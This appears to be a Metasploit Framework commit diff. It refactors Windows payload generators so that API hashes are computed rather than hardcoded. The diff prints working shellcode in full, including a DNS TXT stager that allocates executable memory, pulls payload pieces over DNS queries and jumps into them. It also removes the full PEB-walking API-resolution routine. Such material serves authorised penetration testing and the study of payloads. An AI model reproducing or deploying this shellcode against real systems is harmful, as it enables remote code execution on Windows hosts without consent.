fix(payloads): removing hardcoded block-api hashes

Author: dledda-r7

lib/msf/core/payload/windows/exitfunk.rb

@@ -33,13 +33,13 @@ def asm_exitfunk(opts={})
     when 'thread'
       asm << %Q^
         mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
-        push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+        push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")}        ; hash( "kernel32.dll", "GetVersion" )
         call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
         cmp al, 6              ; If we are not running on Windows Vista, 2008 or 7
         jl exitfunk_goodbye    ; Then just call the exit function...
         cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
         jne exitfunk_goodbye   ;
-        mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+        mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")}     ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
       exitfunk_goodbye:        ; We now perform the actual call to the exit function
         push.i8 0              ; push the exit function parameter
         push ebx               ; push the hash of the exit function

lib/msf/core/payload/windows/reverse_http.rb

@@ -442,7 +442,7 @@ def asm_reverse_http(opts={})
     else
       asm << %Q^
     failure:
-      push 0x56A2B5F0        ; hardcoded to exitprocess for size
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
       call ebp
       ^
     end

lib/msf/core/payload/windows/reverse_named_pipe.rb

@@ -147,7 +147,7 @@ def asm_reverse_named_pipe(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end

lib/msf/core/payload/windows/reverse_tcp.rb

@@ -201,7 +201,7 @@ def asm_reverse_tcp(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end

lib/msf/core/payload/windows/reverse_udp.rb

@@ -129,7 +129,7 @@ def asm_reverse_udp(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end

lib/msf/core/payload/windows/reverse_win_http.rb

@@ -476,7 +476,7 @@ def asm_reverse_winhttp(opts={})
       else
         asm << %Q^
       failure:
-        push 0x56A2B5F0        ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
         ^
       end

lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb

@@ -59,8 +59,8 @@ def generate_reverse_named_pipe(opts={})
       and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned
       call start              ; Call start, this pushes the address of 'api_call' onto the stack.
       #{asm_block_api}
-      start:
-        pop rbp               ; block API pointer
+     start:
+      pop rbp                 ; block API pointer
       #{asm_reverse_named_pipe(opts)}
     ^
     Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string
@@ -145,7 +145,7 @@ def asm_reverse_named_pipe(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp
       ^
     end

lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb

@@ -173,7 +173,7 @@ def asm_reverse_tcp(opts={})
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0       ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp
       ^
     end

modules/payloads/singles/windows/dns_txt_query_exec.rb

@@ -9,6 +9,7 @@ module MetasploitModule
 
   include Msf::Payload::Windows
   include Msf::Payload::Single
+  include Msf::Payload::Windows::BlockApi
 
   def initialize(info = {})
     super(merge_info(info,
@@ -72,185 +73,98 @@ def generate(_opts = {})
     bufferreg 	= "edi"
 
     #create actual payload
-    payload_data = <<EOS
-  cld			; clear direction flag
-  call start		; start main routine
-; Stephen Fewer's block_api
-; block_api code (Stephen Fewer)
-api_call:
-  pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
-  mov ebp, esp           ; Create a new stack frame
-  xor edx, edx           ; Zero EDX
-  mov edx, fs:[edx+48]   ; Get a pointer to the PEB
-  mov edx, [edx+12]      ; Get PEB->Ldr
-  mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
-next_mod:
-  mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
-  movzx ecx, word [edx+38] ; Set ECX to the length we want to check
-  xor edi, edi           ; Clear EDI which will store the hash of the module name
-loop_modname:            ;
-  xor eax, eax           ; Clear EAX
-  lodsb                  ; Read in the next byte of the name
-  cmp al, 'a'            ; Some versions of Windows use lower case module names
-  jl not_lowercase       ;
-  sub al, 0x20           ; If so normalise to uppercase
-not_lowercase:           ;
-  ror edi, 13            ; Rotate right our hash value
-  add edi, eax           ; Add the next byte of the name
-  loop loop_modname      ; Loop until we have read enough
-  ; We now have the module hash computed
-  push edx               ; Save the current position in the module list for later
-  push edi               ; Save the current module hash for later
-  ; Proceed to iterate the export address table,
-  mov edx, [edx+16]      ; Get this modules base address
-  mov eax, [edx+60]      ; Get PE header
-  add eax, edx           ; Add the modules base address
-  mov eax, [eax+120]     ; Get export tables RVA
-  test eax, eax          ; Test if no export address table is present
-  jz get_next_mod1       ; If no EAT present, process the next module
-  add eax, edx           ; Add the modules base address
-  push eax               ; Save the current modules EAT
-  mov ecx, [eax+24]      ; Get the number of function names
-  mov ebx, [eax+32]      ; Get the rva of the function names
-  add ebx, edx           ; Add the modules base address
-  ; Computing the module hash + function hash
-get_next_func:           ;
-  jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module
-  dec ecx                ; Decrement the function name counter
-  mov esi, [ebx+ecx*4]   ; Get rva of next module name
-  add esi, edx           ; Add the modules base address
-  xor edi, edi           ; Clear EDI which will store the hash of the function name
-  ; And compare it to the one we want
-loop_funcname:           ;
-  xor eax, eax           ; Clear EAX
-  lodsb                  ; Read in the next byte of the ASCII function name
-  ror edi, 13            ; Rotate right our hash value
-  add edi, eax           ; Add the next byte of the name
-  cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
-  jne loop_funcname      ; If we have not reached the null terminator, continue
-  add edi, [ebp-8]       ; Add the current module hash to the function hash
-  cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for
-  jnz get_next_func      ; Go compute the next function hash if we have not found it
-  ; If found, fix up stack, call the function and then value else compute the next one...
-  pop eax                ; Restore the current modules EAT
-  mov ebx, [eax+36]      ; Get the ordinal table rva
-  add ebx, edx           ; Add the modules base address
-  mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
-  mov ebx, [eax+28]      ; Get the function addresses table rva
-  add ebx, edx           ; Add the modules base address
-  mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
-  add eax, edx           ; Add the modules base address to get the functions actual VA
-  ; We now fix up the stack and perform the call to the desired function...
-finish:
-  mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad
-  pop ebx                ; Clear off the current modules hash
-  pop ebx                ; Clear off the current position in the module list
-  popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
-  pop ecx                ; Pop off the original return address our caller will have pushed
-  pop edx                ; Pop off the hash value our caller will have pushed
-  push ecx               ; Push back the correct return value
-  jmp eax                ; Jump into the required function
-  ; We now automagically return to the correct caller...
-get_next_mod:            ;
-  pop eax                ; Pop off the current (now the previous) modules EAT
-get_next_mod1:           ;
-  pop edi                ; Pop off the current (now the previous) modules hash
-  pop edx                ; Restore our position in the module list
-  mov edx, [edx]         ; Get the next module
-  jmp.i8 next_mod        ; Process this module
-
-; actual routine
-start:
-  pop ebp			; get ptr to block_api routine
-
-; first allocate some space in heap to hold payload
-alloc_space:
-  xor eax,eax		; clear EAX
-  push 0x40		; flProtect (RWX)
-  mov ah,0x10		; set EAX to 0x1000 (should be big enough to hold up to 26 * 255 bytes)
-  push eax		; flAllocationType MEM_COMMIT (0x1000)
-  push eax		; dwSize (0x1000)
-  push 0x0		; lpAddress
-  push 0xE553A458        	; kernel32.dll!VirtualAlloc
-  call ebp
-  push eax		; save pointer on stack, will be used in memcpy
-  mov #{bufferreg}, eax	; save pointer, to jump to at the end
-
-
-;load dnsapi.dll
-load_dnsapi:
-  xor eax,eax		; put part of string (hex) in eax
-  mov al,0x70
-  mov ah,0x69
-  push eax        	; Push 'dnsapi' to the stack
-  push 0x61736e64        	; ...
-  push esp               	; Push a pointer to the 'dnsapi' string on the stack.
-  push 0x0726774C        	; kernel32.dll!LoadLibraryA
-  call ebp               	; LoadLibraryA( "dnsapi" )
-
-;prepare for loop of queries
-  mov bl,0x61		; first query, start with 'a'
-
-dnsquery:
-  jmp.i8 get_dnsname	; get dnsname
-
-get_dnsname_return:
-  pop eax			; get ptr to dnsname (lpstrName)
-  mov [eax],bl		; patch sequence number in place
-  xchg esi,ebx		; save sequence number
-  push esp		; prepare ppQueryResultsSet
-  pop ebx			;   (put ptr to ptr to stack on stack)
-  sub ebx,4
-  push ebx
-  push 0x0		; pReserved
-  push ebx		; ppQueryResultsSet
-  push 0x0		; pExtra
-  push #{queryoptions}	; Options
-  push #{wType}		; wType
-  push eax		; lpstrName
-  push 0xC99CC96A 	; dnsapi.dll!DnsQuery_A
-  call ebp		;
-  test eax, eax		; query ok ?
-  jnz jump_to_payload	; no, jump to payload
-  jmp.i8 get_query_result	; eax = 0 : a piece returned, fetch it
-
-
-get_dnsname:
-  call get_dnsname_return
-  db "a.#{dnsname}", 0x00
-
-get_query_result:
-  xchg #{bufferreg},edx	; save start of heap
-  pop #{bufferreg}	; heap structure containing DNS results
-  mov eax,[#{bufferreg}+0x18]	; check if value at offset 0x18 is 0x1
-  cmp eax,1
-  jne prepare_payload	; jmp to payload
-  add #{bufferreg},#{wTypeOffset}	; get ptr to ptr to DNS reply
-  mov #{bufferreg},[#{bufferreg}] ; get ptr to DNS reply
-
-copy_piece_to_heap:
-  xchg ebx,esi		; save counter
-  mov esi,edi		; set source
-  mov edi,[esp+0x8]	; retrieve heap destination for memcpy
-  xor ecx,ecx		; clear ecx
-  mov cl,0xff		; always copy 255 bytes, no matter what
-  rep movsb		; copy from ESI to EDI
-  push edi		; save target for next copy
-  push edi		; 2 more times to make sure it's at esp+8
-  push edi		;
-  inc ebx			; increment sequence
-  xchg #{bufferreg},edx	; restore start of heap
-  jmp.i8 dnsquery	        ; try to get the next piece, if any
-
-prepare_payload:
-  mov #{bufferreg},edx
-
-jump_to_payload:
-  jmp #{bufferreg}	; jump to it
-
-
-
-EOS
+    payload_data = %Q^
+      cld			              ; clear direction flag
+      call start		        ; start main routine
+      #{asm_block_api}
+      ; actual routine
+    start:
+      pop ebp			; get ptr to block_api routine
+
+    ; first allocate some space in heap to hold payload
+    alloc_space:
+      xor eax,eax		; clear EAX
+      push 0x40		; flProtect (RWX)
+      mov ah,0x10		; set EAX to 0x1000 (should be big enough to hold up to 26 * 255 bytes)
+      push eax		; flAllocationType MEM_COMMIT (0x1000)
+      push eax		; dwSize (0x1000)
+      push 0x0		; lpAddress
+      push #{Rex::Text.hash("kernel32.dll", "VirtualAlloc")}        	; kernel32.dll!VirtualAlloc
+      call ebp
+      push eax		; save pointer on stack, will be used in memcpy
+      mov #{bufferreg}, eax	; save pointer, to jump to at the end
+
+
+    ;load dnsapi.dll
+    load_dnsapi:
+      xor eax,eax		; put part of string (hex) in eax
+      mov al,0x70
+      mov ah,0x69
+      push eax        	; Push 'dnsapi' to the stack
+      push 0x61736e64        	; ...
+      push esp               	; Push a pointer to the 'dnsapi' string on the stack.
+      push #{Rex::Text.hash("kernel32.dll", "LoadLibraryA")}        	; kernel32.dll!LoadLibraryA
+      call ebp               	; LoadLibraryA( "dnsapi" )
+
+    ;prepare for loop of queries
+      mov bl,0x61		; first query, start with 'a'
+
+    dnsquery:
+      jmp.i8 get_dnsname	; get dnsname
+
+    get_dnsname_return:
+      pop eax			; get ptr to dnsname (lpstrName)
+      mov [eax],bl		; patch sequence number in place
+      xchg esi,ebx		; save sequence number
+      push esp		; prepare ppQueryResultsSet
+      pop ebx			;   (put ptr to ptr to stack on stack)
+      sub ebx,4
+      push ebx
+      push 0x0		; pReserved
+      push ebx		; ppQueryResultsSet
+      push 0x0		; pExtra
+      push #{queryoptions}	; Options
+      push #{wType}		; wType
+      push eax		; lpstrName
+      push #{Rex::Text.hash("dnsapi.dll", "DnsQuery_A")} 	; dnsapi.dll!DnsQuery_A
+      call ebp		;
+      test eax, eax		; query ok ?
+      jnz jump_to_payload	; no, jump to payload
+      jmp.i8 get_query_result	; eax = 0 : a piece returned, fetch it
+
+    get_dnsname:
+      call get_dnsname_return
+      db "a.#{dnsname}", 0x00
+
+    get_query_result:
+      xchg #{bufferreg},edx	; save start of heap
+      pop #{bufferreg}	; heap structure containing DNS results
+      mov eax,[#{bufferreg}+0x18]	; check if value at offset 0x18 is 0x1
+      cmp eax,1
+      jne prepare_payload	; jmp to payload
+      add #{bufferreg},#{wTypeOffset}	; get ptr to ptr to DNS reply
+      mov #{bufferreg},[#{bufferreg}] ; get ptr to DNS reply
+
+    copy_piece_to_heap:
+      xchg ebx,esi		; save counter
+      mov esi,edi		; set source
+      mov edi,[esp+0x8]	; retrieve heap destination for memcpy
+      xor ecx,ecx		; clear ecx
+      mov cl,0xff		; always copy 255 bytes, no matter what
+      rep movsb		; copy from ESI to EDI
+      push edi		; save target for next copy
+      push edi		; 2 more times to make sure it's at esp+8
+      push edi		;
+      inc ebx			; increment sequence
+      xchg #{bufferreg},edx	; restore start of heap
+      jmp.i8 dnsquery	        ; try to get the next piece, if any
+
+    prepare_payload:
+      mov #{bufferreg},edx
+
+    jump_to_payload:
+      jmp #{bufferreg}	; jump to it
+^
     self.assembly = payload_data
     super
   end